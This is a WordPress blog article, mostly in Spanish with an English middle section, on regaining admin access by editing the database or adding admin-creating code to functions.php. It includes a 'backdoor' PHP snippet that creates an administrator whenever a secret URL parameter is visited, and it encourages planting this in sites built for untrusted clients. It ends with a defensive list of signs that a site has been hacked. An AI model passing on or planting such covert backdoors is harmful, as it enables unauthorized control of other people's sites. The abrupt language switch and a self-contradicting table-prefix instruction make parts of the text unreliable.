Cómo hackear un sitio web de WordPress y recuperar el acceso

¡No aprobamos, aprobamos ni alentamos ningún comportamiento ilegal o malicioso! El propósito de este artículo es explicar cómo hackear o recuperar el acceso a un sitio de WordPress que te pertenece, o al que tienes derechos de edición, administración y acceso. Hagas lo que hagas, lo harás por tu cuenta

Los métodos descritos te ayudarán a recuperar el acceso al sitio incluso si ya no tienes una cuenta, pero requerirán cierta información sobre el sitio y no te ayudarán a hackear cualquier instalación de WordPress al azar.

Cómo hackear un sitio web de WordPress, la guía completa

Situaciones en las que puedes ayudarte a ti mismo

Si te encuentras en una de las siguientes situaciones, nuestros métodos te ayudarán a recuperar el acceso:

• has olvidado el nombre de usuario o la dirección de correo electrónico
• la opción de restablecer la contraseña no funciona en el servidor de alojamiento
• los correos electrónicos de restablecimiento de contraseña no llegan
• ya no tienes acceso a la dirección de correo electrónico de la cuenta
• conoces el nombre de usuario y la contraseña, pero la combinación no funciona

Para utilizar los métodos descritos a continuación, necesitarás sólo uno de los siguientes:

• Acceso FTP al servidor, o
• acceso de cPanel al servidor, o
• acceso a la base de datos MySQL y la posibilidad de conectarse a ella de forma remota

Método nº 1 - a la manera de MySQL

Utiliza este método para cambiar la contraseña (o el nombre de usuario si es necesario) de un usuario existente o para crear una nueva cuenta. Necesitarás acceso al cPanel o acceso directo a la base de datos del sitio a través de MySQL Empecemos por cambiar la contraseña de un usuario existente.

Si utilizas cPanel, inicia sesión (siempre se puede acceder a cPanel a través del https://yoursite.com:2083 ), localiza y abre phpMyAdmin La lista de bases de datos y tablas está a la izquierda. Estás buscando la tabla que termina en _users. Probablemente será wp_users, pero si tienes más de un sitio de WordPress instalado en el servidor, tienes que encontrar el correcto.

La tabla correcta tendrá el usuario que quieres editar en ella. Sigue el mismo procedimiento si te conectas a MySQL a través de algún cliente externo como SQLyog. Una vez que localices la tabla y el registro del usuario real, es el momento de cambiar la contraseña.

Como probablemente ya te habrás dado cuenta, la contraseña se guarda en el user_pass con el algoritmo MD5. Abre el campo generador MD5 online introduce la contraseña que quieres utilizar y haz clic en "Hash" Copia la cadena generada y sustituye la contraseña original con ella. En phpMyAdmin, puedes editar el campo haciendo doble clic sobre él. El procedimiento es similar al de otros clientes de MySQL. Guarda los cambios y accede a WordPress con tu nueva contraseña.

Sigo con el método nº 1: crear un nuevo usuario

La creación de un nuevo usuario es un poco más complicada, pero aún así se puede gestionar en menos de un minuto Crear un nuevo registro en la tabla de usuarios y rellena user_login, user_pass (con hash, utilizando la función MD5 descrita anteriormente) y user_email. Todos los demás campos pueden permanecer vacíos; no tienen importancia. Guarda el nuevo registro. Una vez guardado, MySQL le dará un ID único. Es el número del campo ID. Recuérdalo.

Ahora ve a _usermeta mesa. Recuerda, el prefijo de la tabla tiene que ser el mismo que el de los usuarios. Por ejemplo wp_users y wp_usersmeta. Si el prefijo no es el mismo, estás editando la tabla equivocada (de alguna otra instalación de WP) y la nueva cuenta no funcionará. Vamos a crear dos nuevos registros. Ignora el umeta_id para ambos. Establece user_id al valor que acabas de recordar (el nuevo valor del ID en la tabla del usuario). Para el primer registro establece meta_key a wpct_user_level y meta_value a 10. Para el segundo meta_key a wpct_capabilities y meta_value a a:1:{s:13:"administrator";b:1;}. Guarda ambos. Ya has terminado - ¡conéctate!

Método #2 - la manera de functions.php

Este método se puede utilizar editando functions.php a través de cPanel o utilizando un cliente FTP para hacerlo. Si utilizas cPanel, busca el Administrador de Archivos y ábrelo Primero tenemos que encontrar la carpeta del tema activo.

Ve a public_html/wp_content/themes carpeta. Si ves inmediatamente tu tema y sabes cuál es, estupendo. Abre su carpeta y empieza a editar functions.php. Si no es así, abre el sitio, haz clic con el botón derecho del ratón en cualquier lugar y selecciona "Ver fuente". A continuación, pulsa Ctrl + F y empieza a escribir /themes/ pronto tendrás un montón de URLs resaltadas, y reconocerás el nombre de la carpeta del tema activo.

Búscalo en la estructura de archivos, ábrelo y empieza a editarlo functions.php. Copia/pega el siguiente código al final del archivo Cuidado con el cierre ?> Etiquetas PHP si las tienes. Tienen que estar en la última línea. Por tanto, inserta el código antes de ellos.

$new_user_email="[email protected]";
$new_user_password = '12345';

if(!username_exists($new_user_email)) {
  $user_id = wp_create_user($new_user_email, 
$new_user_password, $new_user_email);

  wp_update_user(array('ID' => $user_id, 'nickname' 
=> $new_user_email));

  $user = new WP_User($user_id);
  $user->set_role('administrator');
}

Edit only the first two lines of the code to reflect your new account. If there’s already a user in WP with that email a new account won’t be created, so make sure it’s new. Change the password as well – don’t get hacked by script kiddies. After saving the file simply open your site, the code will be run, a new account with administrator privileges created and you’ll be able to login with it.
After you do so, remember to delete the code from functions.php.
Other hacking methods
By knowing the FTP, cPanel or MySQL password you’re proving that you have legitimate access right to the server and therefore should have access to the WordPress installation(s) as well. If you don’t have any of those accounts, then you’re up to no good (hacking into other people sites), and that’s not nice!
Please remember that gaining unauthorized access to any computers, sites or servers is a serious crime and is promptly dealt with in most countries.
If you don’t have time to set up your blog, let us know so we can try to help.
How to create a backdoor in WordPress
When the front door is closed, you might try the back door. This might sound like a malicious way of using the code for entering the site without having the access to it, but there are actually times when you need to control your own site if somebody stole it.
If it’s creating websites for other people something you do, sooner or later there will be a client who will refuse to pay you for your work; a client who will delete your login information and take over control of everything you have done. Sometimes, it will be enough to create a new user via FTP or reset a password. When that’s not enough, you might want to hack your way back in or create backdoor access to your admin pages.
But if you decided to hide a small piece of code in your WordPress environment, you might save yourself some dignity and gain access to the WordPress site with administrator privileges. And that’s where the games begin.
No matter how many times this thief deletes your information or restores a backup on a server he probably owns, there is a chance he doesn’t know anything about backdoor entrances. If he did, he probably wouldn’t even need your help in setting up WordPress, right?
Create a backdoor:
OK, enough with the talk; here’s a piece of code you will need to get the job done:
Open functions.php file
Copy/Paste following code:
add_action('wp_head', 'wploop_backdoor'); 
function wploop_backdoor() {
If ($_GET['backdoor'] == 'knockknock') {
require('wp-includes/registration.php');
If (!username_exists('username')) {
$user_id = wp_create_user('name', 'pass');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}
?>
Save changes
If you leave the code as it is, all you would have to do to create a new admin on the site is visit http://www.yourdomain.com/?backdoor=knockknock.
After the page was loaded, your new username is “name” and password “pass”.
Of course, you can change that in the code above by changing ‘name’ and ‘pass’ to whatever you want. You can also change the link to your back door by changing ‘backdoor’ and/or ‘knockknock’ to anything you come up with.
Try the function – not only it is fun but it can really help you sometime in the future when you’re about to make a website for someone you can’t trust completely. You should also level up your WordPress and blogging skills.
How to create a new user account via FTP
Creating new user accounts on WordPress is very easy. As an admin, you need to navigate to the Users admin page where you can create a new account for any user role. That can be done in a matter of seconds and a newly created user can immediately log in with the given username and password.
But what happens if you lose access to your WordPress admin? Things might get a bit more complicated, but don’t worry – we have a function for you which can save your admin life.
Whether another admin deleted your account, whether you have deleted all users from the database by mistake, used a malfunctioning plugin or got hacked, you can still get back in control. Sometimes you might be able to get access only to your FTP server while the HTTP one will be out of your reach and you will need to create a new admin. While that might be a rare case, the following function will save you.
To create a new account outside the WordPress admin environment, all you will need is FTP access to your site. As an admin, you should have all the needed information to log in to your server and you can quickly create a new account by creating a new function in your theme.
Create a new user account via FTP:
Open FTP client and connect to your account
Navigate to wp-content/themes
Open the folder of the theme you are using
Search for functions.php file and edit it
Copy and paste the following function:
function admin_account(){
$user="Username";
$pass="Password";
$email="[email protected]";
if ( !username_exists( $user )  && !email_exists( 
$email ) ) {
$user_id = wp_create_user( $user, $pass, $email );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
} }
add_action('init','admin_account');

Cambia el nombre de usuario, la contraseña y el correo electrónico por algo único
Guarda los cambios

Asegúrate de que el nombre de usuario y contraseña, y la dirección de correo electrónico que establezcas en la función son únicos o de lo contrario la función no funcionará correctamente. Una vez que hayas guardado los cambios, habrás terminado y podrás navegar a tu panel de inicio de sesión de WP. Utiliza la nueva información para volver a iniciar sesión y, una vez que hayas verificado la cuenta, podrás eliminar la función del archivo functions.php.
La función mostrada arriba crea una cuenta de administrador, pero puedes modificarla fácilmente para crear una cuenta con cualquier otro rol de usuario. Simplemente cambiar el rol en el 8th fila del código al editor, autor, colaborador, suscriptor o cualquier otro rol de usuario que hayas creado.
Desgraciadamente, si has perdido tu cuenta de administrador, también habrás perdido todos los mensajes escritos con ese nombre de usuario. Por eso, siempre debes guardar una copia de seguridad que puedas recuperar fácilmente. Si estás leyendo esto mientras tienes tu cuenta de administrador, toma esto como un recordatorio para crear una copia de seguridad inmediatamente y guarda este artículo en tus favoritos por si tienes que crear una cuenta fuera de WordPress en el futuro.
10 señales de que tu sitio WordPress ha sido hackeado
WordPress es una enorme plataforma de blogs. Hay millones de usuarios y parece que el número crece rápidamente cada día. La gente incluso tiende a transferir sus sitios web creados en otros sistemas de gestión de contenidos a este sistema de código abierto con más frecuencia de lo que podrías pensar. Y, aunque esto es bueno, significa que los hackers también pondrán a WordPress en un lugar destacado cuando intenten invadir sitios aleatorios.
Normalmente, si te hackean, lo sabrás al instante. Tu sitio se volverá inaccesible; no podrás iniciar sesión y, a veces, un hacker incluso dejará un mensaje en la página principal. Pero la mayoría de las veces, es posible que ni siquiera te des cuenta de que algo ha cambiado. En esta parte del artículo, vamos a mostrarte varias señales que pueden mostrarte que tu sitio de WordPress ha sido hackeado y algunas soluciones al problema.
1. Inicio de sesión infructuoso
Esta señal es bastante evidente. Si has utilizado una combinación de nombre de usuario y contraseña durante un tiempo sin tener nunca problemas, puedes sospechar si de repente WordPress no reconoce tu cuenta Si un hacker consigue entrar en tu sitio, lo más probable es que cambie rápidamente tus privilegios de administrador.
Tal vez tenga que cambiar tu contraseña o eliminar completamente tu cuenta. Antes de que empiece a cundir el pánico después de la primera vez que WordPress te envíe un mensaje sobre un nombre de usuario/contraseña incorrecto, ten en cuenta el hecho de que puedes haber introducido una combinación incorrecta o que puedes haber activado el botón de bloqueo de mayúsculas.

Solución: Intenta recuperar la contraseña por correo electrónico o utiliza otra cuenta para volver a conectarte. Para asegurarte de que tu inicio de sesión es seguro, te recomendamos que instales Login Ninja plugin para WordPress.

2. Se añade contenido malicioso a tu sitio







Si empiezas a notar contenido desconocido en tu sitio, puedes empezar a preocuparte. Cuando tengan la oportunidad de acceder a tu área de administración, los hackers podrán cambiar tu núcleo y los archivos de tu tema y plugin. Eso significa que podrán cambiar todo lo que quieran.
Mientras que algunos piratas informáticos modificarán drásticamente el aspecto de tu sitio web e incluso señalarán que te han pirateado, los otros serán mucho más sutiles al respecto.

Solución: Intenta buscar contenido oculto en el código del sitio web. Es posible que haya enlaces a sitios maliciosos que los hackers hayan colocado en el pie de página de tu sitio, o que hayan instalado ventanas emergentes que se abran regularmente a tus clientes. Utiliza Security Ninja para escanear tu sitio o vigilarlo continuamente en busca de este tipo de problemas.

3. Visitas sospechosas
Si no estás haciendo un seguimiento de tu sitio web, deberías empezar a hacerlo inmediatamente. Una forma sencilla de hacerlo es utilizando Google Analytics que, entre otras muchas funciones, puede decirte cuántas visitas recibes y de dónde vienen esas visitas. Después de algún tiempo, conseguirás conocer tu sitio web. Eso significa que sabrás de dónde proceden las visitas, sabrás cuándo lanzas una nueva campaña y cuándo hay nuevos enlaces de promoción lanzados al mercado.
Pero si de repente te das cuenta de que tu sitio está recibiendo un gran número de nuevas visitas desde el dominio sospechosoquerrás investigarlo más a fondo porque puede que tu sitio haya sido hackeado. Normalmente, ese tipo de visitas se traducirá en una tasa de rebote del 100%, lo que significa que sólo se ha accedido a una página. Los piratas informáticos suelen utilizar sistemas automatizados que llevan a otros sitios malos al tuyo. Tanto si se trata de un código malicioso que se ejecuta en tu sitio como si te has convertido en parte de una red de spam, las cosas pueden ponerse serias, y tendrás que revisar tu sitio en busca de código malicioso.
4. Una caída repentina del tráfico







A diferencia de la última señal mencionada de haber sido hackeado, ésta puede alertarte porque de repente hay un descenso en el número de visitas. En lugar de remitirte nuevas visitas, un hacker podría enviar visitas fuera de tu sitio. Esto puede ocurrir porque un hacker ha redirigido tu sitio a otro. La otra razón para obtener menos visitantes es que Google haya puesto tu sitio en la lista negra. Esta acción mostraría un mensaje a todos los usuarios que podrían decidir no abrir tu sitio porque está infectado.

Solución: Utiliza la herramienta de Google Estado del sitio de navegación segura para comprobar si tu sitio está marcado como inseguro y actualmente es peligroso visitarlo.

5. Los resultados del motor de búsqueda son extraños
Si no has notado ningún cambio en tu sitio, pero descubres que los resultados de las búsquedas en Google y otros motores de búsqueda son extraños (muestran títulos diferentes y otros metadatos), esto podría ser una clara señal de un sitio hackeado. Un hacker podría haber cambiado tu contenido de una manera que sólo puede ser visible para un experto. Aun así, el cambio sería visible en los resultados del motor de búsqueda.
6. No puedes enviar/recibir correos electrónicos
Una vez que un hacker consigue acceder a tu sitio, probablemente querrá utilizar tu servidor para enviar spam a todos los demás. Cuando descubras que no puedes enviar o recibir nuevos correos electrónicos desde tu WordPress, esto puede ser una clara señal de que te han hackeado. Vuelve a comprobar tu correo electrónico y luego comprueba con tu proveedor que no hay ningún error.

Solución: Prueba tu WordPress función de correo con este plugin gratuito.

7. El sitio no existe







Hay veces que los hackers no acceden a tu sitio para plantar código malicioso, redirigir a los usuarios o utilizar tu correo electrónico para el spam. A veces, lo único que querrán hacer es colapsar tu sitio. En raras ocasiones, un hacker conseguirá borrar todo el servidor. Por eso es importante que alojes tus archivos en un empresa de alojamiento de renombre que se encargará de la seguridad y también de mantener copias de seguridad diarias o al menos semanales de tu sitio web. Es una buena práctica que también hagas tus propias copias de seguridad de vez en cuando para que el sitio pueda ser restaurado rápidamente.

Solución: Instala uno de los mejores plugins para la gestión de copias de seguridad en WordPress.

8. Archivos sospechosos
Similar al contenido malicioso que puede añadirse a los archivos existentes, un hacker puede plantar archivos adicionales en cualquier lugar de tu carpeta raíz. Es bueno saber cómo funciona WordPress, pero si no tienes tanta experiencia, deberías tener a tu disposición una herramienta de seguridad que pueda comprobar todos tus archivos y actividades. Recientemente, hemos revisado el Security Ninja, que es una herramienta perfecta para comprobar todos tus archivos de WordPress.

Solución: Intenta buscar archivos que no pertenezcan a tu instalación de WordPress. Utiliza el Ninja de Seguridad para escanear tu sitio de forma regular y encontrar esos archivos automáticamente. A continuación, borra los archivos o elimina el código malicioso de los archivos infectados. No olvides el complemento Core Scanner para Security Ninja.

9. Nuevos miembros
Dependiendo de tu sitio, puede que seas el único capaz de añadir nuevos miembros. En ese caso, un correo electrónico en el que se te informe de los nuevos usuarios registrados podría hacer saltar la alarma. Si hay otros administradores con capacidad para añadir nuevos miembros, comprueba con ellos la actividad sospechosa.

Solución: Cambia la URL de inicio de sesión con un plugin gratuito, limita el acceso a tu página de inicio de sesión de WordPress mediante el archivo .htpasswd y utiliza Login Ninja para proteger tu formulario de inicio de sesión en todo momento.

10. Comprueba los eventos programados en tu servidor
A veces, un pirata informático no hará nada en tu sitio web una vez que encuentre su camino. En su lugar, dejarán eventos programados que pueden dañar tu sitio en el futuro. Esta técnica es peligrosa porque un hacker puede dejar sin pistas a las víctimas inexpertas al principio. Puedes estar infectado y no saber nada al respecto.

Solución: Comprueba tus trabajos CRON en un servidor que estés utilizando y asegúrate de que no hay tareas programadas sospechosas.

Finalizando
Esperamos que este artículo te ayude a gestionar un sitio de WordPress más seguro y que te ayude a recuperar el acceso a él en situaciones adversas. Y aunque tu sitio esté limpio, no lo des por sentado.   Asegúrate siempre de que tu blog es lo más seguro posible. Te sugerimos plugins de seguridad para WordPress que pueden salvarte en la mayoría de las ocasiones. Aun así, no seas tú quien utilice una contraseña insegura, y ten cuidado cuando hackees tu propio sitio de WordPress.